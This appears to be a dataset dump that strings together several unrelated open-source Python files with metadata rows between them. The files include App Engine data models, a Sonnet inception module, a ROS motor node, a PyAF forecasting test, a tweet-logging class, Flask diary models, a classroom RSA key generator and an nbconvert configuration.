    count = db.IntegerProperty(default=1)  # how many users carry this tag
class Event(db.Model):
    """An appointment between an expert (owner) and a visitor."""
    subject = db.StringProperty()
    description = db.TextProperty()
    owner = db.StringProperty()    # expert's identifier
    visitor = db.StringProperty()  # visiting user's identifier
    start_time = db.DateTimeProperty()
    end_time = db.DateTimeProperty()
    created_on = db.DateTimeProperty(auto_now_add=True)
class Review(db.Model):
    """A rating and comment left by one user for another after an event."""
    event = db.ReferenceProperty(Event, collection_name='event_set') # TODO make required=True
    for_user = db.ReferenceProperty(User, required=True, collection_name='for_user_set')
    by_user = db.ReferenceProperty(User, required=True, collection_name='by_user_set')
    rating = db.IntegerProperty(default=3)  # presumably a 1-5 scale; confirm in UI code
    description = db.TextProperty()
    modified_on = db.DateTimeProperty(auto_now=True)
class ClientStream(db.Model):
    """A live media stream published by a connected client."""
    clientId = db.StringProperty(required=True)
    visitor = db.StringProperty()
    name = db.StringProperty(default='Anonymous')
    publish = db.StringProperty(required=True)  # URL this client publishes to
    play = db.StringProperty()                  # URL others play this stream from
    is_owner = db.BooleanProperty(default=False)
    owner = db.StringProperty(required=True)
    modified_on = db.DateTimeProperty(auto_now=True)
    created_on = db.DateTimeProperty(auto_now_add=True)

    def __repr__(self):
        return '<ClientStream clientId=%r visitor=%r name=%r is_owner=%r owner=%r />'%(self.clientId, self.visitor, self.name, self.is_owner, self.owner)

    def get_object(self, full=True):
        """Serialize for the client; full=False exposes only the clientId."""
        if full:
            return {'clientId': self.clientId, 'name': self.name, 'url': self.publish}
        else:
            return {'clientId': self.clientId}
class OfflineMessage(db.Model):
    """A chat message stored for delivery to a currently-offline receiver."""
    sender = db.StringProperty()
    senderName = db.StringProperty()
    receiver = db.StringProperty()
    text = db.StringProperty(multiline=True)
    created_on = db.DateTimeProperty(auto_now_add=True)

    def __repr__(self):
        return '<OfflineMessage sender=%r senderName=%r receiver=%r text=%r />'%(self.sender, self.senderName, self.receiver, self.text)

    def get_object(self):
        """Serialize the delivery payload shown to the receiver."""
        return {'senderName': self.senderName, 'text': self.text}
| lgpl-3.0 | -634,891,817,617,899,600 | 36.680851 | 153 | 0.672409 | false | 3.78312 | false | false | false |
thesilencelies/SonnetConvs | InceptionModule.py | 1 | 1790 | #implimentation of the standard inceptionnet v3 inception module in sonnet
import tensorflow as tf
import sonnet as snt
class InceptionModule(snt.AbstractModule):
    """Inception-style block with four parallel branches (5x5 factored as
    two stacked 3x3 convs, a single 3x3 conv, a max-pooled branch and a
    plain 1x1 conv), each fed through a 1x1 bottleneck, then flattened and
    concatenated along axis 1."""

    def __init__(self, output_channels, name="inception_module"):
        # output_channels: channel count used by every convolution below.
        super(InceptionModule, self).__init__(name=name)
        self._output_channels = output_channels

    def _build(self, inputs):
        # Each branch is flattened before concatenation, so the module
        # returns a rank-2 (batch, features) tensor, not a feature map.
        reshapeFlat = lambda x : tf.contrib.layers.flatten(x)
        # 1x1 bottleneck convolutions feeding each branch.
        conv1d5 = snt.Conv2D(output_channels=self._output_channels, kernel_shape=1,
                stride=1,name="inception5input")
        conv1d3 = snt.Conv2D(output_channels=self._output_channels, kernel_shape=1,
                stride=1,name="inception3input")
        conv1dm = snt.Conv2D(output_channels=self._output_channels, kernel_shape=1,
                stride=1,name="inceptionpoolinput")
        conv1d1 = snt.Conv2D(output_channels=self._output_channels, kernel_shape=1,
                stride=1,name="inception1channel")
        # 5x5 receptive field factored into two stacked 3x3 convolutions.
        conv3d5a = snt.Conv2D(output_channels=self._output_channels, kernel_shape=3,
                stride=1,name="inception5stage1")
        conv3d5b = snt.Conv2D(output_channels=self._output_channels, kernel_shape=3,
                stride=1,name="inception5stage2")
        conv3d3 = snt.Conv2D(output_channels=self._output_channels, kernel_shape=3,
                stride=1,name="inception3channel")
        # NOTE(review): canonical Inception v3 pools with 3x3/stride-1; this
        # 2x2/stride-2 pool halves only the pooled branch's spatial size
        # (flattening hides the mismatch) -- confirm it is intentional.
        maxpool = lambda x : tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
                strides=[1, 2, 2, 1], padding='SAME')
        return tf.concat([reshapeFlat(conv3d5b(conv3d5a(conv1d5(inputs)))),
                reshapeFlat(conv3d3(conv1d3(inputs))),
                reshapeFlat(maxpool(conv1dm(inputs))),
                reshapeFlat(conv1d1(inputs))],1) # then connect it.
| apache-2.0 | -6,797,985,732,095,887,000 | 43.75 | 81 | 0.632961 | false | 3.429119 | false | false | false |
YutingZhang/lmdis-rep | exp-ae-aflw-30.py | 1 | 2231 | import tensorflow as tf
import os
import sys
from copy import copy
from model.pipeline import Pipeline
from tensorflow.python import debug as tf_debug
if __name__ == "__main__":
num_keypoints = 30
patch_feature_dim = 8
decoding_levels = 5
kp_transform_loss = 1e4
recon_weight = 0.001
learning_rate=0.01
keypoint_separation_bandwidth=0.04
keypoint_separation_loss_weight = 10.0
opt = {
"optimizer": "Adam",
"data_name": "aflw_80x80",
"recon_name": "gaussian_fixedvar_in_01",
"encoder_name": "general_80x80",
"decoder_name": "general_80x80",
"latent_dim": num_keypoints*2+(num_keypoints+1)*patch_feature_dim,
"train_color_jittering": True,
"train_random_mirroring": False,
"train_batch_size": 8,
"train_shuffle_capacity": 1000,
"learning_rate": learning_rate,
"max_epochs": 2000,
"weight_decay": 1e-6,
"test_steps": 5000,
"test_limit": 200,
"recon_weight": recon_weight,
}
opt["encoder_options"] = {
"keypoint_num": num_keypoints,
"patch_feature_dim": patch_feature_dim,
"ae_recon_type": opt["recon_name"],
"keypoint_concentration_loss_weight": 100.,
"keypoint_axis_balancing_loss_weight": 200.,
"keypoint_separation_loss_weight": keypoint_separation_loss_weight,
"keypoint_separation_bandwidth": keypoint_separation_bandwidth,
"keypoint_transform_loss_weight": kp_transform_loss,
"keypoint_decoding_heatmap_levels": decoding_levels,
"keypoint_decoding_heatmap_level_base": 0.5**(1/2),
"image_channels": 3,
}
opt["decoder_options"] = copy(opt["encoder_options"])
# -------------------------------------
model_dir = os.path.join("results/aflw_30")
checkpoint_dir = 'pretrained_results'
checkpoint_filename = 'celeba_30/model/snapshot_step_205317'
vp = Pipeline(None, opt, model_dir=model_dir)
print(vp.opt)
with vp.graph.as_default():
sess = vp.create_session()
vp.run_full_train_from_checkpoint(sess, checkpoint_dir = checkpoint_dir, checkpoint_filename=checkpoint_filename)
vp.run_full_test(sess)
| apache-2.0 | -6,170,820,400,219,724,000 | 32.298507 | 121 | 0.618557 | false | 3.390578 | false | true | false |
q14035/pimouse_ros | scripts/motors2.py | 1 | 2178 | #!/usr/bin/env python
#encoding: utf8
import sys, rospy, math
from pimouse_ros.msg import MotorFreqs
from geometry_msgs.msg import Twist
from std_srvs.srv import Trigger, TriggerResponse
class Motor():
    """ROS node wrapper around the Raspberry Pi Mouse motor device files.

    Subscribes to raw per-wheel frequencies ('motor_raw') and velocity
    commands ('cmd_vel'), and exposes motor_on/motor_off Trigger services.
    """

    def __init__(self):
        # Start with the driver disabled; exit if the device is unwritable.
        if not self.set_power(False): sys.exit(1)

        rospy.on_shutdown(self.set_power)  # power off when the node stops

        self.sub_raw = rospy.Subscriber('motor_raw', MotorFreqs, self.callback_raw_freq)
        self.sub_cmd_vel = rospy.Subscriber('cmd_vel', Twist, self.callback_cmd_vel)
        self.srv_on = rospy.Service('motor_on', Trigger, self.callback_on)
        self.srv_off = rospy.Service('motor_off', Trigger, self.callback_off)
        self.last_time = rospy.Time.now()  # time of last cmd_vel, for watchdog
        self.using_cmd_vel = False

    def set_power(self, onoff = False):
        """Enable/disable the motor driver via /dev/rtmotoren0; True on success."""
        en = "/dev/rtmotoren0"
        try:
            with open(en, 'w') as f:
                f.write("1\n" if onoff else "0\n")
            self.is_on = onoff
            return True
        except:
            rospy.logerr("cannot write to " + en)
            return False

    def set_raw_freq(self, left_hz, right_hz):
        """Write per-wheel step frequencies [Hz] to the driver device files."""
        if not self.is_on:
            rospy.logerr("not enpowered")
            return
        try:
            with open("/dev/rtmotor_raw_l0", 'w') as lf, open("/dev/rtmotor_raw_r0", 'w') as rf:
                lf.write(str(int(round(left_hz))) + "\n")
                rf.write(str(int(round(right_hz))) + "\n")
        except:
            rospy.logerr("cannot write to rtmotor_raw_*")

    def callback_raw_freq(self, message):
        self.set_raw_freq(message.left_hz, message.right_hz)

    def callback_cmd_vel(self, message):
        # Conversion constants encode the robot's wheel/tread geometry --
        # assumed from the vendor examples; TODO confirm against hardware.
        forward_hz = 80000.0*message.linear.x/(9*math.pi)
        rot_hz = 400.0*message.angular.z/math.pi
        self.set_raw_freq(forward_hz-rot_hz, forward_hz+rot_hz)
        self.using_cmd_vel = True
        self.last_time = rospy.Time.now()

    def onoff_response(self, onoff):
        """Switch power and build the Trigger service response."""
        d = TriggerResponse()
        d.success = self.set_power(onoff)
        d.message = "ON" if self.is_on else "OFF"
        return d

    def callback_on(self, message): return self.onoff_response(True)
    def callback_off(self, message): return self.onoff_response(False)
if __name__ == '__main__':
    rospy.init_node('motors')
    m = Motor()
    rate = rospy.Rate(10)
    while not rospy.is_shutdown():
        # Watchdog: stop the wheels if no cmd_vel arrived for one second.
        if m.using_cmd_vel and rospy.Time.now().to_sec() - m.last_time.to_sec() >= 1.0:
            m.set_raw_freq(0, 0)
            m.using_cmd_vel = False
        rate.sleep()
| gpl-3.0 | 1,233,239,839,957,850,400 | 29.676056 | 87 | 0.674472 | false | 2.574468 | false | false | false |
antoinecarme/pyaf | tests/perf/test_ozone_debug_perf.py | 1 | 1566 | import pandas as pd
import numpy as np
# from memory_profiler import profile
# from memprof import *
import pyaf.ForecastEngine as autof
import pyaf.Bench.TS_datasets as tsds
#get_ipython().magic('matplotlib inline')
# @memprof
def test_ozone_debug_perf():
    """Exercise PyAF on the ozone dataset with debug-performance tracing on
    and cycles / time-based trends / AR models disabled, then forecast H
    steps and dump the model info and forecasts as JSON."""
    b1 = tsds.load_ozone()
    df = b1.mPastData

    # df.tail(10)
    # df[:-10].tail()
    # df[:-10:-1]
    # df.describe()

    lEngine = autof.cForecastEngine()
    lEngine

    H = b1.mHorizon;
    # Restrict the model search space so the run stays fast and the debug
    # performance accounting stays readable.
    lEngine.mOptions.mDebugPerformance = True;
    lEngine.mOptions.mEnableCycles = False;
    lEngine.mOptions.mEnableTimeBasedTrends = False;
    lEngine.mOptions.mEnableARModels = False;
    lEngine.train(df , b1.mTimeVar , b1.mSignalVar, H);
    lEngine.getModelInfo();
    print(lEngine.mSignalDecomposition.mTrPerfDetails.head());

    lEngine.mSignalDecomposition.mBestModel.mTimeInfo.mResolution

    lEngine.standardPlots("outputs/my_ozone");

    # Apply the trained model to the training data and forecast H steps.
    dfapp_in = df.copy();
    dfapp_in.tail()

    dfapp_out = lEngine.forecast(dfapp_in, H);
    #dfapp_out.to_csv("outputs/ozone_apply_out.csv")
    dfapp_out.tail(2 * H)
    print("Forecast Columns " , dfapp_out.columns);
    Forecast_DF = dfapp_out[[b1.mTimeVar , b1.mSignalVar, b1.mSignalVar + '_Forecast']]
    print(Forecast_DF.info())
    print("Forecasts\n" , Forecast_DF.tail(H).values);

    print("\n\n<ModelInfo>")
    print(lEngine.to_json());
    print("</ModelInfo>\n\n")
    print("\n\n<Forecast>")
    print(Forecast_DF.tail(2*H).to_json(date_format='iso'))
    print("</Forecast>\n\n")

test_ozone_debug_perf();
| bsd-3-clause | 6,925,707,315,643,373,000 | 25.1 | 87 | 0.664112 | false | 2.89464 | false | false | false |
assamite/TwatBot | tweets/reasoning.py | 1 | 4674 | '''
.. py:module:: reasoning
:platform: Unix
Reasoning object for the tweets.
'''
import logging
import traceback
logger = logging.getLogger('tweets.default')
class Reasoning():
    '''Bookkeeping for how a tweet was constructed.

    Holds the chosen color (``color_code``/``color_name``), the tweet text,
    retweet details, the framework objects used (``muse``, ``context``,
    ``color_semantics``) together with their class names, and any
    appreciation values computed while building the tweet. Arbitrary extra
    attributes may be supplied as keyword arguments.
    '''

    def __init__(self, **kwargs):
        # Populate every known field with its default, then let keyword
        # arguments override (or extend) them.
        defaults = {
            'color_code': "",
            'color_name': "",
            'tweet': "",
            'tweeted': False,
            'retweet': False,
            'retweet_url': "",
            'original_tweet': "",
            'muse': None,
            'context': None,
            'color_semantics': None,
            'muse_classname': "",
            'color_semantics_classname': "",
            'context_classname': "",
            'values': {},
            'media': None,
            'appreciation': 0.0,
        }
        for field, default in defaults.items():
            setattr(self, field, default)
        for field, value in kwargs.items():
            setattr(self, field, value)

    def __repr__(self):
        return "".join("{}: {}\n".format(key, value)
                       for key, value in self.__dict__.items())

    def set_attr(self, name, value):
        '''Define new or change old attribute value.

        Setting ``muse``, ``context`` or ``color_semantics`` also records
        the value's class name in the matching ``*_classname`` attribute.
        Caller should take care of possible conflicts when changing
        existing attribute values.

        :param name: Name of the attribute
        :type name: str
        :param value: New attribute value
        :type value: Object
        '''
        setattr(self, name, value)
        classname_fields = {
            'muse': 'muse_classname',
            'context': 'context_classname',
            'color_semantics': 'color_semantics_classname',
        }
        if name in classname_fields:
            setattr(self, classname_fields[name], value.__class__.__name__)

    def set_attrs(self, mappings):
        '''Define new or change old attribute values in a batch.

        :param mappings: Attribute mappings
        :type mappings: dict
        '''
        for name, value in mappings.items():
            self.set_attr(name, value)

    def save(self):
        '''Save the tweet (and retweet bookkeeping) to the database.

        :returns: bool -- True if the save succeeded, False for an empty
            tweet or when any exception happened during the save.
        '''
        from models import EveryColorBotTweet, Tweet, ReTweet

        if self.tweet == "":
            logger.info("Saving called for empty tweet. Skipping.")
            return False

        try:
            tweet_inst = Tweet(message = self.tweet, value = self.appreciation,
                               muse = self.muse_classname,
                               context = self.context_classname,
                               color_code = self.color_code,
                               color_name = self.color_name)
            tweet_inst.save()
            if self.retweet:
                # NOTE(review): screen_name is only present when supplied
                # via kwargs by the caller -- confirm all retweet paths set it.
                screen_name = self.screen_name
                if screen_name == 'everycolorbot':
                    entry = EveryColorBotTweet.objects.get_or_none(url = self.retweet_url)
                    if entry:
                        entry.tweeted = True
                        entry.save()
                retweet_inst = ReTweet(tweet_url = self.retweet_url,
                                       screen_name = screen_name, tweet = tweet_inst)
                retweet_inst.save()
            logger.info("Tweet saved to database: {}".format(self.tweet))
        except Exception:
            e = traceback.format_exc()
            logger.error("Could not save tweet to database, because of error: {}".format(e))
            return False
        return True
| mit | 2,346,785,769,061,129,700 | 34.409091 | 104 | 0.545999 | false | 4.485605 | false | false | false |
swarna-k/MyDiary | app/models.py | 1 | 1566 | from app import db
from werkzeug import generate_password_hash, check_password_hash
class User(db.Model):
    """Application user authenticated via a salted password hash."""
    id = db.Column(db.Integer, primary_key = True)
    firstname = db.Column(db.String(100))
    lastname = db.Column(db.String(100))
    email = db.Column(db.String(120), unique=True)
    # Werkzeug's generate_password_hash emits "method$salt$hash" strings
    # that are far longer than 54 characters (pbkdf2:sha256 is ~94).
    # The previous String(54) column truncated them on length-enforcing
    # databases, making check_password fail for every user.
    pwdhash = db.Column(db.String(255))
    entries = db.relationship('Entry', backref='author', lazy='dynamic')
    reminders = db.relationship('Reminder', backref='author', lazy='dynamic')

    def __init__(self, firstname, lastname, email, password):
        # Normalize names and email so lookups behave case-insensitively.
        self.firstname = firstname.title()
        self.lastname = lastname.title()
        self.email = email.lower()
        self.set_password(password)

    def set_password(self, password):
        """Store only a salted hash of the password, never the plaintext."""
        self.pwdhash = generate_password_hash(password)

    def check_password(self, password):
        """Return True if `password` matches the stored hash."""
        return check_password_hash(self.pwdhash, password)

    def __repr__(self):
        return '<User %r>' % (self.firstname)
class Entry(db.Model):
    """A diary entry written by a User."""
    id = db.Column(db.Integer, primary_key = True)
    name = db.Column(db.String(100))  # entry title
    body = db.Column(db.Text)
    timestamp = db.Column(db.DateTime)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'))

    def __repr__(self):
        return '<Entry %r>' % (self.body)
class Reminder(db.Model):
    """A reminder scheduled by a User for a future time."""
    id = db.Column(db.Integer, primary_key = True)
    when = db.Column(db.DateTime)  # time the reminder should fire
    body = db.Column(db.Text)
    timestamp = db.Column(db.DateTime)  # presumably creation time; confirm
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'))

    def __repr__(self):
        return '<Reminder %r>' % (self.body)
| bsd-3-clause | 1,779,423,689,113,203,200 | 29.705882 | 75 | 0.65645 | false | 3.303797 | false | false | false |
omarkadry/rsa_algorithm | RSA.py | 1 | 5283 | #!/usr/bin/python
#Algoriths Project Part 1a
#Omar Kadry
#CMSC 441
#Dr. Marron
#IMPLEMENTATION NOTES
#Python's built in pow function uses Binary Exponentiation and reducing modulo n to compute modular
#exponentiation. This is the same algorithm as MODULAR-EXPONENTIATION(a,b,n) as used in the text
#For large number mutliplication Python uses Karatsuba's method as discusssed in class
#Encrypted using modulus of 2048 bits
#Message Encrypted with Private Key =
#549335432742725778252187541104443188156944438806863457411666058499398272260706426139538267238120336092084632198514701950566203930065985324580534295693425367212921830205866755643739579288731322322946366466576799796974416100601383412159359169170613839877922173796152893918170136479717941167924064476336789776106984955596378941959676443995574307557232184168653454435294749983774161045180981596162964832360087083009219442813368249004389009182055455524458934480504555947413171214222377987666294266525295763559510397442092718659910879958017424466509571661222667744582625838716048450963735149873220637697801126262181088272
#n = 2372112898706524098783243835606671423055801883554227254030743710505202283932667011668956139382911768876035660572032080308562219037288900124052316286309512108625859836958747947762092799677854295671866288119481685786760570903533545560435541052326183788082279075073373227880942687435505490994525413101260845901748238215480998501123816262694263026377952163660645333809073068011604416987281948409408692393376191358516220341631487894075618891499412550098438456600441042870219500840853342452184082591601805986792948794525871595912715813197678328912976549353915846570322821639411967156886422360861220109970600152445030560129
#public key e = 1977623957817836883919633554596704012915783900570809149483856078010145425692545878452812725561415102822918517227924598205956910940350062144643427460974258169951841328548095289498955467345087157904399185646775059360160689508306113707875539862799501027047474838298216312008836598256088581250099042957573530717659415412893768343977899980494510094815770699761034869232518446869348437561961594909995056962983992121384916099020899755884457999313029602625570516932900789485878260172195900227111449085645227576679740196755445527867666825244974372425673866849078226602801561771006724501838806746943672716086807419555183315337s
import sys
import os
import random
import math
import argparse
s = 5 #s for miller-rabin test: number of random witnesses per candidate
#Constants to make code more readable
PRIME = 1      # probable-prime verdict from miller_rabin
COMPOSITE = 2  # definitely-composite verdict from miller_rabin
#Generates Random Psuedoprimes of size bits
#validates with miller rabin test
def generate_rand(size):
    """Return a probable prime of roughly `size` bits.

    Draws a random starting point from the OS CSPRNG, makes it odd, then
    scans upward in steps of 2 until Miller-Rabin accepts a candidate.
    """
    n = random.SystemRandom().getrandbits(size)
    # getrandbits can return 0 or 1, which have no meaning here; re-draw.
    while(n == 1 or n == 0):
        n = random.SystemRandom().getrandbits(size)
    while True:
        if n % 2 == 0:
            n = n + 1
        if(miller_rabin(n,s) == PRIME):
            return n
        n = n + 2
#Miller-Rabin test
def miller_rabin(n,s):
    """Probabilistic primality test (CLRS MILLER-RABIN).

    Tries s random witnesses; returns COMPOSITE as soon as one proves n
    composite, otherwise PRIME (error probability at most 2**-s).
    """
    for j in range(0,s):
        a = random.SystemRandom().randint(1, n-1)
        if(witness(a,n)):
            return COMPOSITE
    return PRIME
#Witness function for miller-rabin
def witness(a,n):
    """Return True if a proves n composite (CLRS WITNESS).

    Writes n-1 = 2**t * u with u odd, computes a**u mod n and squares it
    t times, watching for a non-trivial square root of 1 mod n.
    """
    t,u = calc_t_u(n-1)
    x = []
    x.append(modular_exponentiation(a,u,n))
    for i in range(1,t+1):
        x.append(modular_exponentiation(x[i-1],2,n))
        # A non-trivial square root of 1 modulo n proves n composite.
        if (x[i] == 1) and (x[i-1] != 1) and (x[i-1] != n-1):
            return True
    # Fermat check: for prime n, a**(n-1) mod n must equal 1.
    if x[t] != 1:
        return True
    return False
#Computes (a ** b) mod n with Python's built-in three-argument pow, which
#uses the same binary square-and-reduce algorithm as the text.
def modular_exponentiation(a, b, n):
    return pow(int(a), int(b), int(n))
#Calculates t and u for the witness function
def calc_t_u(n):
    """Return (t, u) such that n == 2**t * u with u odd.

    Uses floor division so u stays an int on Python 3; the previous
    `u = u / 2` produced a float there, which broke pow() in witness().
    """
    t = 0
    u = n
    while u % 2 == 0:
        u //= 2
        t += 1
    return t, u
#Picks a public exponent e at random, retrying until it is relatively
#prime to phi_n (so a multiplicative inverse exists).
def get_e(phi_n):
    while True:
        candidate = random.SystemRandom().randint(3, phi_n)
        if euclid(phi_n, candidate) == 1:
            return candidate
#Euclid and extended Euclid are kept iterative on purpose: recursive
#versions were found to hit Python's recursion limit once the modulus
#size reached >= 1024 bits.
def euclid(a, b):
    """Greatest common divisor of two non-negative integers."""
    while b != 0:
        a, b = b, a % b
    return a
#Extended Euclid's Algorithm (iterative -- see recursion-depth note above)
def extend_euclid(a, b):
    """Return (g, x, y) such that a*x + b*y == g == gcd(a, b)."""
    old_r, r = a, b
    old_x, x = 1, 0
    old_y, y = 0, 1
    while r != 0:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_x, x = x, old_x - q * x
        old_y, y = y, old_y - q * y
    return old_r, old_x, old_y
#Computes d = e^-1 mod phi_n via the extended Euclidean algorithm.
def get_mult_inverse(e, phi_n):
    """Return the multiplicative inverse of e modulo phi_n, or -1 when no
    inverse exists (gcd(e, phi_n) != 1).

    Bug fix: the old check `d % b == 0` compared against b = 1 and was
    therefore always true, so -1 was unreachable even for non-coprime
    inputs. The inverse exists exactly when the gcd is 1.
    """
    d, x, _y = extend_euclid(e, phi_n)
    if d == 1:
        # e*x + phi_n*_y == 1  =>  e*x = 1 (mod phi_n)
        return x % phi_n
    return -1
def msg_to_int(m):
    """Pack a string into a single integer, one byte (8 bits) per character."""
    acc = 0
    for ch in m:
        acc = (acc << 8) ^ ord(ch)
    return acc
if __name__ == '__main__':
    # NOTE: this entry point uses Python 2 print statements; run under
    # Python 2 (the helper functions above are version-agnostic).
    private_key = 0
    public_key = 0
    parser = argparse.ArgumentParser(description="Generates an RSA public and private key")
    parser.add_argument("-s", "--size", type=int,
            help="Size in bits of RSA Key to Generate", required=True)
    parser.add_argument("-m", "--message", type=str, help="A Message to Encrypt")
    args = parser.parse_args()
    modulus_size = args.size
    # Choose two distinct random primes, each half the modulus size.
    p = generate_rand(modulus_size//2)
    q = generate_rand(modulus_size//2)
    while(p == q):
        q = generate_rand(modulus_size//2)
    n = p * q
    phi_n = (p - 1) * (q - 1)
    # Public exponent e coprime to phi(n); private exponent d = e^-1 mod phi(n).
    e = get_e(phi_n)
    d = int(get_mult_inverse(e, phi_n))
    print "N = \n", n, '\n'
    print "Private Key d = \n", int(d), '\n'
    print "Public Key e = \n", int(e), '\n'
    if(args.message):
        m = args.message
        "Encrypting: %s" % m  # NOTE(review): no-op expression; likely meant to be printed
        print "\"",m,"\" encrypted with the private key is\n",
        # "Encrypt" by signing: c = m^d mod n with the private exponent.
        m = msg_to_int(m)
        p = modular_exponentiation(m,d,n)
        print p
| mit | 2,305,337,433,324,493,600 | 33.305195 | 633 | 0.769071 | false | 2.381876 | false | false | false |
mprat/learningjulia | nbconvert_config.py | 1 | 7416 | from nbconvert.preprocessors import ExecutePreprocessor, Preprocessor
import numpy as np
def jekyllurl(path):
    """
    Take the filepath of an image output by the ExportOutputProcessor
    and convert it into a URL we can use with Jekyll
    (every "../.." segment is stripped).
    """
    return "".join(path.split("../.."))
def svg_filter(svg_xml):
    """
    Remove the DOCTYPE and XML version lines from
    the inline XML SVG by keeping only the <svg>...</svg> span.
    """
    joined = "".join(svg_xml)
    start = joined.index("<svg")
    stop = joined.index("</svg>") + len("</svg>")
    return joined[start:stop]
def var_def_to_var_list(var_def):
    """Parse a Julia @manipulate variable definition into its value list.

    Supports "linspace(start, stop, num)" (returned as a numpy array) and
    literal lists "[a, b, c]" (returned as a list of stripped strings).
    Raises TypeError for any other form.

    Bug fix: np.linspace requires an integer sample count; the old code
    passed float(num), which modern numpy rejects with a TypeError.
    """
    if 'linspace' in var_def:
        inner = var_def.replace("linspace(", "").replace(")", "")
        start, stop, num = inner.split(",")
        return np.linspace(
            float(start),
            float(stop),
            int(float(num)))
    elif '[' in var_def and ']' in var_def:
        items = var_def.replace("[", "").replace("]", "")
        return [item.strip() for item in items.split(",")]
    else:
        raise TypeError("not implemented for {}".format(var_def))
class ExecuteWithInteractPreprocessor(ExecutePreprocessor):
    """Execute notebook cells, expanding Julia ``@manipulate`` cells by
    re-running the cell body once for every value of the manipulated
    variable and collecting all outputs onto the original cell."""

    def preprocess_cell(self, cell, resources, cell_index):
        if cell.cell_type != 'code':
            return cell, resources

        if "@manipulate" in cell.source:
            original_source = cell.source
            # Run just the @manipulate header plus the closing line to get
            # the Interact widget output itself.
            cell_manipulate = cell.copy()
            cell_source = original_source.split("\n")
            cell_manipulate.source = "\n".join([cell_source[0], cell_source[-1]])
            manipulate_output = self.run_cell(cell_manipulate)
            outs = []
            outs.extend(manipulate_output)
            # The body between the header and closing line is re-executed
            # once per value of the manipulated variable.
            main_source = "\n".join(cell_source[1:-1])
            # Header looks like "@manipulate for name = <values>"; strip the
            # keywords and split into the variable name and its definition.
            var_def = cell_source[0].replace("@manipulate", "")
            var_def = var_def.replace("for", "").strip().split("=")
            var_name, var_list = var_def
            # currently this only works for a single for loop
            # turn all the variables into a loop
            all_vars = var_def_to_var_list(var_list)
            for next_var in all_vars:
                var_defs = "{}={}".format(var_name, next_var)
                cell_copy = cell.copy()
                cell_copy.source = "\n".join([var_defs, main_source.strip()])
                outputs = self.run_cell(cell_copy)
                outs.extend(outputs)
            # Restore the original source so the rendered notebook shows it.
            cell.source = original_source
            cell.outputs = outs
            # fix the outputs
            # probably better done at the postprocessing step
            # import ipdb; ipdb.set_trace()
            # raise TypeError("stopping")
        else:
            outputs = self.run_cell(cell)
            cell.outputs = outputs

        return cell, resources
        # if 'Interact' in cell.outputs[0]['data']['text/plain']:
        # there should be a widget here
class RemoveInteractJsShimPreprocessor(Preprocessor):
    """Strip Interact.jl's inline ``interact-js-shim`` <div> from HTML cell
    outputs and copy the notebook's widget state into resources for later
    preprocessors (see InsertWidgetsPreprocessor)."""

    def preprocess(self, nb, resources):
        """
        make sure the widgets resources get put into the resources
        """
        if 'widgets' in nb['metadata'].keys():
            resources['metadata']['widgets'] = nb['metadata']['widgets']
        return super(RemoveInteractJsShimPreprocessor, self).preprocess(nb, resources)

    def preprocess_cell(self, cell, resources, cell_index):
        """
        remove any outputs that have interact-js-shim
        """
        if 'outputs' in cell:
            outputs = cell['outputs']
            new_outputs = []
            # Rebuild the output list, dropping or trimming shim HTML.
            for output in outputs:
                new_output = output.copy()
                if "data" in output.keys():
                    data_output = output["data"]
                    new_data_output = data_output.copy()
                    if 'text/html' in data_output.keys():
                        text_html = data_output['text/html']
                        if text_html.startswith('<div id=\"interact-js-shim\">'):
                            # Cut the shim <div>...</div> and keep whatever
                            # HTML surrounds it (6 == len("</div>")).
                            start_index = text_html.find('<div id=\"interact-js-shim\">')
                            end_index = text_html.find('</div>')
                            new_html = ""
                            if start_index > 0:
                                new_html += text_html[0:start_index]
                            if end_index + 6 < len(text_html):
                                new_html += text_html[end_index+6:]
                            new_html = new_html.strip()
                            if len(new_html) > 0:
                                new_data_output['text/html'] = new_html
                            else:
                                del new_data_output['text/html']
                        else:
                            new_data_output['text/html'] = text_html
                    # Drop the data dict entirely if nothing is left in it.
                    if len(new_data_output.keys()) > 0:
                        new_output['data'] = new_data_output
                    else:
                        del new_output['data']
                    # Outputs that lost all their data are removed outright.
                    if 'data' in new_output:
                        new_outputs.append(new_output)
                else:
                    new_outputs.append(new_output)
            cell['outputs'] = new_outputs
        return cell, resources
class InsertWidgetsPreprocessor(Preprocessor):
    """Replace the plain-text Interact output of a ``@manipulate`` cell
    with a Jupyter widget-view <script> tag that references the matching
    widget model (looked up by slider description)."""

    def preprocess_cell(self, cell, resources, cell_index):
        """
        if the cell is a cell with @manipulate, add the appropriate
        widget script into the output
        """
        if cell.cell_type != 'code':
            return cell, resources

        if "@manipulate" in cell.source:
            # Widget state was stashed here by RemoveInteractJsShimPreprocessor.
            widget_state = resources['metadata']['widgets']['application/vnd.jupyter.widget-state+json']['state']
            # The slider's description appears quoted inside the text/plain
            # repr of the first output; extract the first quoted token.
            interact_options = cell.outputs[0]['data']['text/plain']
            start_index = interact_options.find('"')
            model_name = interact_options[start_index + 1:]
            next_index = model_name.find('"')
            model_name = model_name[:next_index]

            # match the widget based on the descriptions
            matched_model_id = None
            for model_id in widget_state.keys():
                if widget_state[model_id]['state']['description'] == model_name:
                    matched_model_id = model_id
                    break

            # construct the script tag
            # NOTE(review): matched_model_id stays None when no description
            # matches, which would raise on concatenation -- confirm inputs.
            script_tag = '<script type="application/vnd.jupyter.widget-view+json">{"model_id": "' + matched_model_id + '"}</script>'
            cell.outputs[0]['data']['text/html'] = script_tag

        return cell, resources
# nbconvert configuration object (get_config is injected by the loader).
c = get_config()
c.NbConvertApp.export_format = 'html'
# Extracted images land under the site's assets so Jekyll can serve them.
c.NbConvertApp.output_files_dir = '../../assets/imgs/{notebook_name}'
# Preprocessor pipeline: execute, merge streams, extract outputs, then the
# custom Interact cleanup/widget-insertion passes defined above.
c.HTMLExporter.preprocessors = [
    'nbconvert.preprocessors.ExecutePreprocessor',
    # ExecuteWithInteractPreprocessor,
    'nbconvert.preprocessors.coalesce_streams',
    'nbconvert.preprocessors.ExtractOutputPreprocessor',
    RemoveInteractJsShimPreprocessor,
    InsertWidgetsPreprocessor]
c.HTMLExporter.template_file = 'notebooks/jekyll.tpl'
c.HTMLExporter.filters = {"jekyllimgurl": jekyllurl, "svg_filter": svg_filter}
# if there's an error in one of the cells let the execution keep going
c.ExecutePreprocessor.allow_errors = True
# disable the timeout
c.ExecutePreprocessor.timeout = -1
c.ExecutePreprocessor.iopub_timeout = 10
